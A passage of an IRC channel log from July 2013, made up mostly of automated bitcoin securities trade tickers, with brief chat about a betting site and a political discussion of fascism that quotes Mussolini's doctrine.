[COGNITIVE] 5 @ 0.5 = 2.5 BTC [-] Jul 28 14:28:30 [BTCTC] [COGNITIVE] 1 @ 0.5031 BTC [+] Jul 28 14:28:32 [BTCTC] [COGNITIVE] 2 @ 0.5 = 1 BTC [-] Jul 28 14:29:19 [BTCTC] [ACTIVEMINING] 74 @ 0.006993 = 0.5175 BTC [+] Jul 28 14:29:21 [BTCTC] [ACTIVEMINING] 48 @ 0.006994 = 0.3357 BTC [+] Jul 28 14:29:23 [BTCTC] [ACTIVEMINING] 300 @ 0.006997 = 2.0991 BTC [+] Jul 28 14:29:24 [BTCTC] [ACTIVEMINING] 78 @ 0.006999 = 0.5459 BTC [+] Jul 28 14:35:24 [BTCTC] [ACTIVEMINING] 25 @ 0.00686 = 0.1715 BTC [-] Jul 28 14:35:26 [BTCTC] [ACTIVEMINING] 12 @ 0.006859 = 0.0823 BTC [-] Jul 28 14:35:28 [BTCTC] [ACTIVEMINING] 50 @ 0.006859 = 0.343 BTC [-] Jul 28 14:35:29 [BTCTC] [ACTIVEMINING] 63 @ 0.006856 = 0.4319 BTC [-] Jul 28 14:37:06 [BTCTC] [ACTIVEMINING] 25 @ 0.006859 = 0.1715 BTC [+] Jul 28 14:37:10 [BTCTC] [ACTIVEMINING] 116 @ 0.006858 = 0.7955 BTC [-] Jul 28 14:37:35 [BTCTC] [ASICMINER-PT] 1 @ 4.576 BTC [+] Jul 28 14:38:47 [BTCTC] [ACTIVEMINING] 50 @ 0.006995 = 0.3498 BTC [+] Jul 28 14:38:49 [BTCTC] [ACTIVEMINING] 565 @ 0.006997 = 3.9533 BTC [+] Jul 28 14:38:51 [BTCTC] [ACTIVEMINING] 100 @ 0.006997 = 0.6997 BTC [+] Jul 28 14:38:52 [BTCTC] [ACTIVEMINING] 22 @ 0.006999 = 0.154 BTC [+] Jul 28 14:38:54 [BTCTC] [ACTIVEMINING] 202 @ 0.006999 = 1.4138 BTC [+] Jul 28 14:43:40 [BTCTC] [BASIC-MINING] 2 @ 0.5489 = 1.0978 BTC [-] Jul 28 14:44:09 [BTCTC] [BASIC-MINING] 1 @ 0.535 BTC [-] Jul 28 14:47:26 [BTCTC] [TAT.MINIGAME] 1700 @ 0.0002705 = 0.4599 BTC [+] Jul 28 14:57:17 [BTCTC] [DMS.SELLING] 46 @ 0.01957 = 0.9002 BTC [-] Jul 28 14:59:07 [BTCTC] [ACTIVEMINING] 1760 @ 0.006999 = 12.3182 BTC [+] Jul 28 14:59:44 [MPEX] [S.MPOE] 5500 @ 0.00079689 = 4.3829 BTC [-] Jul 28 15:03:43 [BTCTC] [ACTIVEMINING] 124 @ 0.0055 = 0.682 BTC [-] Jul 28 15:04:47 [BTCTC] [ACTIVEMINING] 25 @ 0.006862 = 0.1716 BTC [+] Jul 28 15:04:52 [BTCTC] [ACTIVEMINING] 99 @ 0.006861 = 0.6792 BTC [-] Jul 28 15:05:42 [BTCTC] [BASIC-MINING] 1 @ 0.53 BTC [-] Jul 28 15:05:48 [BTCTC] [ACTIVEMINING] 50 @ 0.006863 = 0.3432 BTC [+] Jul 28 15:05:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00329 BTC [-] Jul 28 15:08:07 [BTCTC] [DMS.MINING] 1 @ 0.0126 BTC [+] Jul 28 15:08:30 [BTCTC] [BASIC-MINING] 2 @ 0.52 = 1.04 BTC [-] Jul 28 15:08:31 [BTCTC] [DMS.MINING] 5 @ 0.0125 = 0.0625 BTC [-] Jul 28 15:08:43 [BTCTC] [DMS.MINING] 40 @ 0.01247 = 0.4988 BTC [-] Jul 28 15:08:51 [BTCTC] [DMS.MINING] 100 @ 0.01246 = 1.246 BTC [-] Jul 28 15:08:55 [BTCTC] [DMS.MINING] 79 @ 0.01243 = 0.982 BTC [-] Jul 28 15:09:00 [BTCTC] [DMS.MINING] 10 @ 0.0124 = 0.124 BTC [-] Jul 28 15:09:06 [BTCTC] [DMS.MINING] 35 @ 0.01215 = 0.4253 BTC [-] Jul 28 15:09:11 [BTCTC] [DMS.MINING] 10 @ 0.01211 = 0.1211 BTC [-] Jul 28 15:09:16 [BTCTC] [DMS.MINING] 10 @ 0.0121 = 0.121 BTC [-] Jul 28 15:09:20 [BTCTC] [DMS.MINING] 1 @ 0.0121 BTC [-] Jul 28 15:09:26 [BTCTC] [DMS.MINING] 2 @ 0.0121 = 0.0242 BTC [-] Jul 28 15:09:29 [BTCTC] [DMS.MINING] 2 @ 0.0121 = 0.0242 BTC [-] Jul 28 15:09:38 [BTCTC] [DMS.MINING] 2 @ 0.0121 = 0.0242 BTC [-] Jul 28 15:09:42 [BTCTC] [DMS.MINING] 3 @ 0.01207 = 0.0362 BTC [-] Jul 28 15:09:47 [BTCTC] [DMS.MINING] 130 @ 0.01203 = 1.5639 BTC [-] Jul 28 15:09:50 [BTCTC] [DMS.MINING] 30 @ 0.012 = 0.36 BTC [-] Jul 28 15:10:08 [BTCTC] [DMS.MINING] 10 @ 0.012 = 0.12 BTC [-] Jul 28 15:10:17 [BTCTC] [DMS.MINING] 80 @ 0.01166 = 0.9328 BTC [-] Jul 28 15:11:15 [BTCTC] [ASICMINER-PT] 1 @ 4.578 BTC [+] Jul 28 15:12:51 [BTCTC] [DMS.MINING] 40 @ 0.01171 = 0.4684 BTC [+] Jul 28 15:12:53 [BTCTC] [DMS.MINING] 10 @ 0.0117 = 0.117 BTC [-] Jul 28 15:15:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.04538 = 0.5899 BTC [+] Jul 28 15:15:48 [BTCTC] [TAT.MINIGAME] 20 @ 0.00031 = 0.0062 BTC [+] Jul 28 15:15:56 [BTCTC] [ACTIVEMINING] 5 @ 0.006974 = 0.0349 BTC [+] Jul 28 15:16:37 [BTCTC] [DMS.PURCHASE] 150 @ 0.03181 = 4.7715 BTC [-] Jul 28 15:16:38 [BTCTC] [DMS.PURCHASE] 39 @ 0.0318 = 1.2402 BTC [-] Jul 28 15:16:40 [BTCTC] [DMS.PURCHASE] 1 @ 0.03168 BTC [-] Jul 28 15:16:41 [BTCTC] [DMS.PURCHASE] 10 @ 0.0316 = 0.316 BTC [-] Jul 28 15:17:18 [BTCTC] [DMS.SELLING] 50 @ 0.02079 = 1.0395 BTC [+] Jul 28 15:17:20 [BTCTC] [DMS.SELLING] 20 @ 0.02079 = 0.4158 BTC [+] Jul 28 15:17:22 [BTCTC] [DMS.SELLING] 23 @ 0.02108 = 0.4848 BTC [+] Jul 28 15:17:23 [BTCTC] [DMS.SELLING] 50 @ 0.02109 = 1.0545 BTC [+] Jul 28 15:17:25 [BTCTC] [DMS.SELLING] 7 @ 0.0211 = 0.1477 BTC [+] Jul 28 15:19:46 [BTCTC] [TAT.ASICMINER] 13 @ 0.04538 = 0.5899 BTC [+] Jul 28 15:20:54 [BTCTC] [TAT.ASICMINER] 8 @ 0.04538 = 0.363 BTC [+] Jul 28 15:23:06 [BTCTC] [TAT.MINIGAME] 35 @ 0.00031 = 0.0109 BTC [+] Jul 28 15:25:19 [BTCTC] [ACTIVEMINING] 4 @ 0.006968 = 0.0279 BTC [-] Jul 28 15:29:03 [BTCTC] [BASIC-MINING] 1 @ 0.5449 BTC [+] Jul 28 15:29:38 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0033 = 0.33 BTC [+] Jul 28 15:32:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006988 = 0.1747 BTC [+] Jul 28 15:32:36 [BTCTC] [ACTIVEMINING] 43 @ 0.006989 = 0.3005 BTC [+] Jul 28 15:32:38 [BTCTC] [ACTIVEMINING] 261 @ 0.00699 = 1.8244 BTC [+] Jul 28 15:32:39 [BTCTC] [ACTIVEMINING] 172 @ 0.006998 = 1.2037 BTC [+] Jul 28 15:32:41 [BTCTC] [ACTIVEMINING] 40 @ 0.006999 = 0.28 BTC [+] Jul 28 15:32:42 [BTCTC] [ACTIVEMINING] 699 @ 0.007 = 4.893 BTC [+] Jul 28 15:32:44 [BTCTC] [ACTIVEMINING] 1000 @ 0.007 = 7 BTC [+] Jul 28 15:32:45 [BTCTC] [ACTIVEMINING] 760 @ 0.007 = 5.32 BTC [+] Jul 28 15:33:04 [BTCTC] [ACTIVEMINING] 25 @ 0.006999 = 0.175 BTC [-] Jul 28 15:33:05 [BTCTC] [ACTIVEMINING] 240 @ 0.007 = 1.68 BTC [+] Jul 28 15:33:40 [BTCTC] [TAT.MINIGAME] 55 @ 0.000271 = 0.0149 BTC [-] Jul 28 15:34:02 [BTCTC] [ACTIVEMINING] 25 @ 0.006902 = 0.1726 BTC [-] Jul 28 15:34:04 [BTCTC] [ACTIVEMINING] 675 @ 0.006901 = 4.6582 BTC [-] Jul 28 15:34:06 [BTCTC] [ACTIVEMINING] 1350 @ 0.0069 = 9.315 BTC [-] Jul 28 15:34:08 [BTCTC] [ACTIVEMINING] 251 @ 0.006856 = 1.7209 BTC [-] Jul 28 15:34:10 [BTCTC] [ACTIVEMINING] 502 @ 0.006855 = 3.4412 BTC [-] Jul 28 15:34:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003301 BTC [+] Jul 28 15:34:44 [BTCTC] [TAT.MINIGAME] 1600 @ 0.000271 = 0.4336 BTC [-] Jul 28 15:37:54 Confirmed bets: 5002 Jul 28 15:37:56 didit. Jul 28 15:41:18 [BTCTC] [TAT.VIRTUALMINE] 1500 @ 0.0033 = 4.95 BTC [-] Jul 28 15:42:52 hey wd. Jul 28 15:43:09 http://bitbet.us/bet/492/rush-limbaugh-sued-by-employee/ Jul 28 15:43:10 lmao Jul 28 15:43:14 BitBet - Rush Limbaugh sued by employee Jul 28 15:48:38 [BTCTC] [ASICMINER-PT] 1 @ 4.578 BTC [+] Jul 28 15:48:40 [BTCTC] [ASICMINER-PT] 5 @ 4.579 = 22.895 BTC [+] Jul 28 15:48:56 [BTCTC] [LTC-ATF.B2] 1 @ 0.01026 BTC [+] Jul 28 15:49:54 bitbet doesn't really seem to be growing. Jul 28 15:50:10 Too few new bets I suspect Jul 28 15:50:27 so go make somer Jul 28 15:50:48 mircea_popescu: I have. 50% reject rate. Gets a bit demoralizing. Jul 28 15:50:56 [MPEX] [S.MPOE] 9900 @ 0.00079956 = 7.9156 BTC [+] Jul 28 15:51:55 yeah, it's a tough thing to balance. Jul 28 15:52:23 [BTCTC] [ACTIVEMINING] 25 @ 0.006855 = 0.1714 BTC [-] Jul 28 15:52:30 [BTCTC] [ACTIVEMINING] 50 @ 0.006854 = 0.3427 BTC [-] Jul 28 15:52:33 I bet, lol, that I'm in the top 10 bitbet bettors Jul 28 15:53:29 by count ? by volume ? Jul 28 15:53:32 By both Jul 28 15:53:42 :) Jul 28 15:54:24 [BTCTC] [DMS.PURCHASE] 1 @ 0.0337 BTC [+] Jul 28 15:55:51 [BTCTC] [ASICMINER-PT] 11 @ 4.583 = 50.413 BTC [+] Jul 28 15:57:03 pretty cool. Jul 28 15:58:12 [BTCTC] [ACTIVEMINING] 25 @ 0.006852 = 0.1713 BTC [-] Jul 28 15:58:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.04524 = 0.1357 BTC [-] Jul 28 15:59:37 [BTCTC] [ASICMINER-PT] 1 @ 4.583 BTC [+] Jul 28 15:59:55 [BTCTC] [TAT.ASICMINER] 33 @ 0.04537 = 1.4972 BTC [+] Jul 28 15:59:57 [BTCTC] [TAT.ASICMINER] 40 @ 0.04538 = 1.8152 BTC [+] Jul 28 15:59:59 [BTCTC] [TAT.ASICMINER] 27 @ 0.04539 = 1.2255 BTC [+] Jul 28 16:00:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.04559 = 0.228 BTC [+] Jul 28 16:00:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0456 = 0.456 BTC [+] Jul 28 16:02:24 [BTCTC] [ACTIVEMINING] 25 @ 0.007075 = 0.1769 BTC [+] Jul 28 16:02:26 [BTCTC] [ACTIVEMINING] 50 @ 0.007076 = 0.3538 BTC [+] Jul 28 16:02:28 [BTCTC] [ACTIVEMINING] 926 @ 0.007077 = 6.5533 BTC [+] Jul 28 16:02:50 [BTCTC] [ACTIVEMINING] 25 @ 0.007079 = 0.177 BTC [+] Jul 28 16:02:52 [BTCTC] [ACTIVEMINING] 450 @ 0.00708 = 3.186 BTC [+] Jul 28 16:04:41 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [-] Jul 28 16:11:05 [BTCTC] [ACTIVEMINING] 25 @ 0.006909 = 0.1727 BTC [-] Jul 28 16:11:11 [BTCTC] [ACTIVEMINING] 37 @ 0.006908 = 0.2556 BTC [-] Jul 28 16:11:15 [BTCTC] [ACTIVEMINING] 50 @ 0.006906 = 0.3453 BTC [-] Jul 28 16:11:17 [BTCTC] [ACTIVEMINING] 280 @ 0.006873 = 1.9244 BTC [-] Jul 28 16:11:18 [BTCTC] [ACTIVEMINING] 10 @ 0.006872 = 0.0687 BTC [-] Jul 28 16:11:20 [BTCTC] [ACTIVEMINING] 550 @ 0.00687 = 3.7785 BTC [-] Jul 28 16:11:22 [BTCTC] [ACTIVEMINING] 130 @ 0.006861 = 0.8919 BTC [-] Jul 28 16:11:23 [BTCTC] [ACTIVEMINING] 261 @ 0.00686 = 1.7905 BTC [-] Jul 28 16:11:25 [BTCTC] [ACTIVEMINING] 5 @ 0.006814 = 0.0341 BTC [-] Jul 28 16:11:26 [BTCTC] [ACTIVEMINING] 10 @ 0.006813 = 0.0681 BTC [-] Jul 28 16:11:28 [BTCTC] [ACTIVEMINING] 642 @ 0.006806 = 4.3695 BTC [-] Jul 28 16:11:40 [BTCTC] [ACTIVEMINING] 25 @ 0.007077 = 0.1769 BTC [+] Jul 28 16:12:53 [BTCTC] [BFMINES] 3 @ 0.0038 = 0.0114 BTC [-] Jul 28 16:13:30 [BTCTC] [ACTIVEMINING] 1 @ 0.007075 BTC [-] Jul 28 16:13:50 [BTCTC] [TAT.MINIGAME] 2 @ 0.00031 = 0.0006 BTC [+] Jul 28 16:17:41 [BTCTC] [ACTIVEMINING] 25 @ 0.007072 = 0.1768 BTC [-] Jul 28 16:18:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.04568 BTC [+] Jul 28 16:19:49 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003301 = 0.0099 BTC [+] Jul 28 16:26:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.04524 = 0.5429 BTC [-] Jul 28 16:28:53 [BTCTC] [TAT.MINIGAME] 9 @ 0.000308 = 0.0028 BTC [-] Jul 28 16:32:53 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003301 = 0.0198 BTC [+] **** BEGIN LOGGING AT Mon Jul 29 01:08:17 2013 Jul 29 01:08:24 [BTCTC] [ACTIVEMINING] 25 @ 0.007598 = 0.19 BTC [+] Jul 29 01:08:26 [BTCTC] [ACTIVEMINING] 161 @ 0.007599 = 1.2234 BTC [+] Jul 29 01:08:57 [BTCTC] [ACTIVEMINING] 25 @ 0.007599 = 0.19 BTC [+] Jul 29 01:08:59 [BTCTC] [ACTIVEMINING] 169 @ 0.0076 = 1.2844 BTC [+] Jul 29 01:09:23 [HAVELOCK] [AM1] 1 @ 4.365 BTC [-] Jul 29 01:09:25 [HAVELOCK] [AM1] 1 @ 4.36 BTC [-] Jul 29 01:09:28 [HAVELOCK] [AM1] 5 @ 4.36 = 21.8 BTC [-] Jul 29 01:10:00 [BTCTC] [ACTIVEMINING] 18 @ 0.007597 = 0.1367 BTC [-] Jul 29 01:10:02 [BTCTC] [ACTIVEMINING] 1 @ 0.007598 BTC [+] Jul 29 01:11:45 [BTCTC] [ACTIVEMINING] 1 @ 0.007598 BTC [+] Jul 29 01:12:12 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000266 = 0.266 BTC [-] Jul 29 01:12:41 [BTCTC] [ACTIVEMINING] 17 @ 0.007598 = 0.1292 BTC [+] Jul 29 01:13:31 [BTCTC] [ACTIVEMINING] 22 @ 0.0076 = 0.1672 BTC [+] Jul 29 01:14:17 [BTCTC] [COGNITIVE] 2 @ 0.561 = 1.122 BTC [+] Jul 29 01:14:51 [BTCTC] [COGNITIVE] 2 @ 0.561 = 1.122 BTC [+] Jul 29 01:16:11 [BTCTC] [TAT.MINIGAME] 18 @ 0.000307 = 0.0055 BTC [+] Jul 29 01:21:47 http://www.theverge.com/2013/7/26/4559066/free-apple-ipad-school-children-la-district now that aapl is funded with tax money, it won't go down Jul 29 01:21:49 All of LA's 640,000 schoolkids will get iPads by the end of 2014 | The Verge Jul 29 01:22:14 lmao Jul 29 01:22:36 [BTCTC] [BTC-BOND] 10 @ 0.009982 = 0.0998 BTC [-] Jul 29 01:22:38 i wonder if teh us ppl even know what a fascist state is. Jul 29 01:23:13 7. Against individualism, the Fascist conception is for the State; and it is for the individual in so far as he coincides with the State, which is the conscience and universal will of man in his historical existence. It is opposed to classical Liberalism, which arose from the necessity of reacting against absolutism, and which brought its historical purpose to an end when the State was transformed into the conscience a Jul 29 01:23:13 nd will of the people. Liberalism denied the State in the interests of the particular individual; Fascism reaffirms the State as the true reality of the individual. And if liberty is to be the attribute of the real man, and not of that abstract puppet envisaged by individualistic Liberalism, Fascism is for liberty. And for the only liberty which can be a real thing, the liberty of the State and of the individual within Jul 29 01:23:13 the State. Therefore, for the Fascist, everything is in the State, and nothing human or spiritual exists, much less has value,-outside the State. In this sense Fascism is totalitarian, and the Fascist State, the synthesis and unity of all values, interprets, develops and gives strength to the whole life of the people. Jul 29 01:25:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.0448 = 0.1792 BTC [+] Jul 29 01:25:58 [BTCTC] [BTC-BOND] 3 @ 0.009998 = 0.03 BTC [+] Jul 29 01:28:48 [BTCTC] [ACTIVEMINING] 24 @ 0.007599 = 0.1824 BTC [-] Jul 29 01:28:49 [BTCTC] [ACTIVEMINING] 5 @ 0.007599 = 0.038 BTC [-] Jul 29 01:28:51 [BTCTC] [ACTIVEMINING] 521 @ 0.0076 = 3.9596 BTC [+] Jul 29 01:30:07 mircea_popescu: doesn't fascism require culturally uniform population? Jul 29 01:31:17 do you think there;'s any population more uniform than the us folk ? Jul 29 01:31:25 for one, i can't imagine asking various us fundamentalistic churches to put state before everything Jul 29 01:31:51 same could have been said of the pope cca 1920 Jul 29 01:32:17 nevertheless, the lateran agreement Jul 29 01:32:33 but pope did nothing, while at least some of them are polit active. Jul 29 01:32:41 this isn;'t actually true. Jul 29 01:32:48 the pope did plenty Jul 29 01:33:47 [BTCTC] [ACTIVEMINING] 1 @ 0.007599 BTC [-] Jul 29 01:34:26 [BTCTC] [ACTIVEMINING] 555 @ 0.007599 = 4.2174 BTC [-] Jul 29 01:34:28 [BTCTC] [ACTIVEMINING] 288 @ 0.0076 = 2.1888 BTC [+] Jul 29 01:34:30 [BTCTC] [ACTIVEMINING] 688 @ 0.007601 = 5.2295 BTC [+] Jul 29 01:34:31 [BTCTC] [ACTIVEMINING] 25 @ 0.007602 = 0.1901 BTC [+] Jul 29 01:34:32 [BTCTC] [ACTIVEMINING] 125 @ 0.007603 = 0.9504 BTC [+] Jul 29 01:34:33 [BTCTC] [ACTIVEMINING] 75 @ 0.007605 = 0.5704 BTC [+] Jul 29 01:34:34 [BTCTC] [ACTIVEMINING] 244 @ 0.00761 = 1.8568 BTC [+] Jul 29 01:36:23 [BTCTC] [ACTIVEMINING] 256 @ 0.00761 = 1.9482 BTC [+] Jul 29 01:36:25 [BTCTC] [ACTIVEMINING] 272 @ 0.007615 = 2.0713 BTC [+] Jul 29 01:36:30 [BTCTC] [ACTIVEMINING] 1000 @ 0.00765 = 7.65 BTC [+] Jul 29 01:36:32 [BTCTC] [ACTIVEMINING] 148 @ 0.007675 = 1.1359 BTC [+] Jul 29 01:36:34 [BTCTC] [ACTIVEMINING] 500 @ 0.007699 = 3.8495 BTC [+] Jul 29 01:36:36 [BTCTC] [ACTIVEMINING] 1100 @ 0.0077 = 8.47 BTC [+] Jul 29 01:36:39 and afaik there isn't even one common language with big hispanic (almost)minority.. Jul 29 01:37:07 [HAVELOCK] [SDSTM] 4 @ 0.0099 = 0.0396 BTC [+] Jul 29 01:37:45 [HAVELOCK] [AM100] 12 @ 0.0428101 = 0.5137 BTC [+] Jul 29 01:38:06 and also the premise of strong leader...i doubt there's anyone who can manage the mess of federal/state agencies/courts/lobbies Jul 29 01:38:08 [HAVELOCK] [HIM] 1 @ 0.19650001 BTC [-] Jul 29 01:39:12 for this we need weimar germany kind of desperation Jul 29 01:40:02 [BTCTC] [ACTIVEMINING] 100 @ 0.00775 = 0.775 BTC [+] Jul 29 01:40:59 [BTCTC] [ACTIVEMINING] 195 @ 0.00775 = 1.5113 BTC [+] Jul 29 01:44:36 [BTCTC] [ACTIVEMINING] 5 @ 0.00775 = 0.0388 BTC [+] Jul 29 01:44:52 jurov you know, the similarities are striking. Jul 29 01:44:59 pre mussolini italy was a mess of local priviledge, Jul 29 01:45:04 the union had barely been instituted. Jul 29 01:45:11 it doesn't take much to PASS FOR a strong leader. Jul 29 01:45:11 [BTCTC] [ACTIVEMINING] 50 @ 0.007749 = 0.3875 BTC [-] Jul 29 01:45:13 [BTCTC] [ACTIVEMINING] 50 @ 0.00775 = 0.3875 BTC [+] Jul 29 01:45:23 any drunken corporal can do the job. it's a matter of perception not of essence. Jul 29 01:45:41 [BTCTC] [ACTIVEMINING] 9 @ 0.00775 = 0.0698 BTC [+] Jul 29 01:45:43 similar to being "the most beautiful girl". it's not something that's hard to do, every group has one. Jul 29 01:46:19 yes. but in the us there are lots of people with whole country privileges already. if it happens it will be very messy Jul 29 01:46:47 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003347 = 0.0435 BTC [+] Jul 29 01:47:00 no argument there. very messy indeed. Jul 29 01:47:05 [BTCTC] [DMS.SELLING] 46 @ 0.02123 = 0.9766 BTC [+] Jul 29 01:47:07 [BTCTC] [DMS.SELLING] 100 @ 0.02124 = 2.124 BTC [+] Jul 29 01:47:08 [BTCTC] [DMS.SELLING] 2 @ 0.02125 = 0.0425 BTC [+] Jul 29 01:47:10 [BTCTC] [DMS.SELLING] 152 @ 0.02125 = 3.23 BTC [+] Jul 29 01:47:12 the contention is that it;'s unavoidable by now, not that it won't be messy. Jul 29 01:47:17 we don't have ruins of monarchy here, but already pretty centralized country Jul 29 01:48:06 [BTCTC] [ACTIVEMINING] 441 @ 0.00775 = 3.4178 BTC [+] Jul 29 01:48:10 so it's questionable if the outcome can be right out labeled fascism Jul 29 01:48:27 well, inasmuch as it meets the definition it can be so labeled. Jul 29 01:48:37 everything in the state and nothing outside the state = fascism. Jul 29 01:49:17 I guess most Frenchmen are fascists then Jul 29 01:49:17 [BTCTC] [ACTIVEMINING] 125 @ 0.007751 = 0.9689 BTC [+] Jul 29 01:49:44 pankkake it's like weeds, the stupidology of the left. Jul 29 01:49:50 perennial, universal, everywhere. Jul 29 01:50:03 [BTCTC] [ACTIVEMINING] 15 @ 0.007752 = 0.1163 BTC [+] Jul 29 01:50:20 [BTCTC] [ASICMINER-PT] 1 @ 4.521 BTC [-] Jul 29 01:50:23 [BTCTC] [ASICMINER-PT] 2 @ 4.52 = 9.04 BTC [-] Jul 29 01:50:26 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [-] Jul 29 01:50:29 [BTCTC] [ASICMINER-PT] 1 @ 4.508 BTC [-] Jul 29 01:50:51 [BTCTC] [ACTIVEMINING] 33 @ 0.007752 = 0.2558 BTC [+] Jul 29 01:51:49 [BTCTC] [ACTIVEMINING] 102 @ 0.007752 = 0.7907 BTC [+] Jul 29 01:51:51 [BTCTC] [ACTIVEMINING] 500 @ 0.007755 = 3.8775 BTC [+] Jul 29 01:51:52 [BTCTC] [ACTIVEMINING] 188 @ 0.007758 = 1.4585 BTC [+] Jul 29 01:51:54 [BTCTC] [ACTIVEMINING] 800 @ 0.007759 = 6.2072 BTC [+] Jul 29 01:51:54 [BTCTC] [ACTIVEMINING] 116 @ 0.00776 = 0.9002 BTC [+] Jul 29 01:51:55 [BTCTC] [ACTIVEMINING] 1123 @ 0.007765 = 8.7201 BTC [+] Jul 29 01:52:17 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] Jul 29 01:52:35 i guess when large swaths of usa run out of water, whole point will be moot Jul 29 01:52:40 *will Jul 29 01:53:07 [BTCTC] [ACTIVEMINING] 40 @ 0.007765 = 0.3106 BTC [+] Jul 29 01:53:55 [BTCTC] [DMS.SELLING] 1 @ 0.02125 BTC [+] Jul 29 01:54:00 jurov starting with california. which already has put > half its farming community out of business for this reason Jul 29 01:54:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.04316 = 0.6474 BTC [-] Jul 29 01:54:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.04316 BTC [-] Jul 29 01:54:54 [BTCTC] [ACTIVEMINING] 1 @ 0.007765 BTC [+] Jul 29 01:54:58 [BTCTC] [ACTIVEMINING] 13 @ 0.007765 = 0.1009 BTC [+] Jul 29 01:55:11 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003347 = 0.01 BTC [+] Jul 29 01:55:24 [BTCTC] [TAT.MINIGAME] 2 @ 0.0003068 = 0.0006 BTC [-] Jul 29 01:56:24 [BTCTC] [ACTIVEMINING] 10 @ 0.007765 = 0.0777 BTC [+] Jul 29 01:56:58 [MPEX] [S.MPOE] 3250 @ 0.00080059 = 2.6019 BTC [+] Jul 29 01:57:02 [MPEX] [S.MPOE] 600 @ 0.00079935 = 0.4796 BTC [-] Jul 29 01:57:14 [BTCTC] [ACTIVEMINING] 10 @ 0.007765 = 0.0777 BTC [+] Jul 29 01:58:40 [BTCTC] [ACTIVEMINING] 23 @ 0.007765 = 0.1786 BTC [+] Jul 29 01:58:42 [BTCTC] [ACTIVEMINING] 234 @ 0.007769 = 1.8179 BTC [+] Jul 29 01:58:43 [BTCTC] [ACTIVEMINING] 480 @ 0.00777 = 3.7296 BTC [+] Jul 29 01:59:26 [BTCTC] [ACTIVEMINING] 1000 @ 0.007799 = 7.799 BTC [+] Jul 29 01:59:28 [BTCTC] [ACTIVEMINING] 1500 @ 0.007799 = 11.6985 BTC [+] Jul 29 01:59:52 [BTCTC] [COGNITIVE] 1 @ 0.6464 BTC [+] Jul 29 02:00:37 [BTCTC] [ACTIVEMINING] 100 @ 0.0078 = 0.78 BTC [+] Jul 29 02:00:39 [BTCTC] [ACTIVEMINING] 400 @ 0.00785 = 3.14 BTC [+] Jul 29 02:00:54 [BTCTC] [ACTIVEMINING] 115 @ 0.007799 = 0.8969 BTC [-] Jul 29 02:01:17 [BTCTC] [TAT.ASICMINER] 12 @ 0.04316 = 0.5179 BTC [-] Jul 29 02:01:23 [BTCTC] [ACTIVEMINING] 16 @ 0.00785 = 0.1256 BTC [+] Jul 29 02:01:56 [BTCTC] [ACTIVEMINING] 100 @ 0.0078 = 0.78 BTC [-] Jul 29 02:01:58 [BTCTC] [ACTIVEMINING] 8 @ 0.0078 = 0.0624 BTC [-] Jul 29 02:02:01 [BTCTC] [ACTIVEMINING] 385 @ 0.007799 = 3.0026 BTC [-] Jul 29 02:02:05 [BTCTC] [ACTIVEMINING] 1 @ 0.007752 BTC [-] Jul 29 02:02:17 [BTCTC] [ACTIVEMINING] 3 @ 0.007751 = 0.0233 BTC [-] Jul 29 02:02:21 [BTCTC] [ACTIVEMINING] 62 @ 0.007726 = 0.479 BTC [-] Jul 29 02:02:26 [BTCTC] [ACTIVEMINING] 125 @ 0.007725 = 0.9656 BTC [-] Jul 29 02:02:28 [BTCTC] [ACTIVEMINING] 9 @ 0.007702 = 0.0693 BTC [-] Jul 29 02:02:40 [BTCTC] [ACTIVEMINING] 84 @ 0.00785 = 0.6594 BTC [+] Jul 29 02:02:58 [BTCTC] [ACTIVEMINING] 500 @ 0.007875 = 3.9375 BTC [+] Jul 29 02:04:01 [BTCTC] [ACTIVEMINING] 110 @ 0.007875 = 0.8663 BTC [+] Jul 29 02:04:06 pankkake: *ahem* Jul 29 02:04:20 [BTCTC] [ACTIVEMINING] 152 @ 0.007875 = 1.197 BTC [+] Jul 29 02:04:24 [BTCTC] [ACTIVEMINING] 5 @ 0.007875 = 0.0394 BTC [+] Jul 29 02:04:56 [BTCTC] [ACTIVEMINING] 41 @ 0.007875 = 0.3229 BTC [+] Jul 29 02:05:00 [BTCTC] [ACTIVEMINING] 282 @ 0.00785 = 2.2137 BTC [-] Jul 29 02:05:34 [BTCTC] [ACTIVEMINING] 6 @ 0.007874 = 0.0472 BTC [+] Jul 29 02:05:42 :) Jul 29 02:06:45 [HAVELOCK] [AM100] 16 @ 0.0428101 = 0.685 BTC [+] Jul 29 02:07:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.0432 = 0.0864 BTC [+] Jul 29 02:07:07 [BTCTC] [TAT.ASICMINER] 46 @ 0.04317 = 1.9858 BTC [-] Jul 29 02:07:08 [BTCTC] [TAT.ASICMINER] 45 @ 0.04316 = 1.9422 BTC [-] Jul 29 02:07:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.04316 = 0.5179 BTC [-] Jul 29 02:08:04 [BTCTC] [ACTIVEMINING] 150 @ 0.007865 = 1.1798 BTC [-] Jul 29 02:08:06 [BTCTC] [ACTIVEMINING] 125 @ 0.00786 = 0.9825 BTC [-] Jul 29 02:08:20 [BTCTC] [ACTIVEMINING] 300 @ 0.00785 = 2.355 BTC [-] Jul 29 02:08:36 [BTCTC] [ACTIVEMINING] 5 @ 0.007874 = 0.0394 BTC [+] Jul 29 02:09:16 [BTCTC] [ACTIVEMINING] 2221 @ 0.00785 = 17.4349 BTC [-] Jul 29 02:09:20 [BTCTC] [ASICMINER-PT] 7 @ 4.508 = 31.556 BTC [-] Jul 29 02:09:22 [BTCTC] 